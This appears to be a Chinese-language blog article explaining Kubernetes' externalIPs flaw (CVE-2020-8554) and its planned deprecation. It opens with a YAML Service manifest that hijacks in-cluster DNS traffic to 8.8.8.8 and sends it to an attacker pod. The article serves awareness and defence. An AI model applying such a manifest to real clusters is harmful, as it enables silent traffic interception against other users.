最新文章

Kubernetes externalIPs:已知六年的安全漏洞,终于要移除了

Kubernetes externalIPs:已知六年的安全漏洞,终于要移除了

TL;DR

Kubernetes Service 的 externalIPs 字段存在长达六年的中间人攻击漏洞(CVE-2020-8554),任何有 Service 创建权限的用户都可以劫持集群流量 –v1.36 终于启动了正式的废弃流程。

开篇:一条命令,劫持集群流量

想象这样一个场景。

你的集群里有一个开发者,他拥有普通的 Service 创建权限 – 这在大多数团队中再正常不过。他写了一段这样的配置:

apiVersion: v1
kind: Service
metadata:
  name: dns-intercept
spec:
  selector:
    app: attacker-pod
  ports:
    - port: 53
      protocol: UDP
  externalIPs:
    - 8.8.8.8

一条 kubectl apply,几秒钟后,集群内所有节点上发往 8.8.8.8:53 的 DNS 查询,全部被悄悄转发到他控制的 Pod。